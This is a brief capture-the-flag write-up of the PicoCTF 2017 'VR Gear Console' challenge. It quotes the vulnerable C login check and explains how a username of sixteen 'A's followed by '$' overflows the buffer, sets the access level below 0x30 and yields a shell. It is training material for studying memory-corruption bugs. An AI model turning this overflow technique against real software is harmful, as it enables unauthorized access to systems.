Tags: pwn
Rating:
https://github.com/Idomin/CTF-Writeups/blob/master/PicoCTF-2017/README.MD
VR Gear Console
Here's the VR gear admin console. See if you can figure out a way to log in. The problem is found here: /problems/51645e84d55d376442beaf264e0908b9
HINTS What happens if you read in more characters than the length of the username buffer? You should look at an ascii table to see what character you need to choose. Numbers are stored in little-endian format, which means that the lowest byte of the number is first. "cat file - | vrgearconsole " will keep the pipe open for commands.
Reference : http://www.asciitable.com/
if (access >= 0xff || access <= 0) {
printf("Login unsuccessful.\n");
exit(10);
} else if (access < 0x30) {
printf("Admin access granted!\n");
printf("The flag is in \"flag.txt\".\n");
system("/bin/sh");
} else {
printf("Login successful.\n");
printf("You do not have permission to access this resource.\n");
exit(1);
}
If Username == AAAAAAAAAAAAAAAAAAAAA for example the acesslevel will be set to 0x41414141 and we get to the else case.
If Username == AAAAAAAAAAAAAAAAA we get 0x00000041 and we need to set access < 0x30 -> Look at asciitable and we know $ is hex 24 so lets go with that.
Username == AAAAAAAAAAAAAAAA$ -> Results in shell.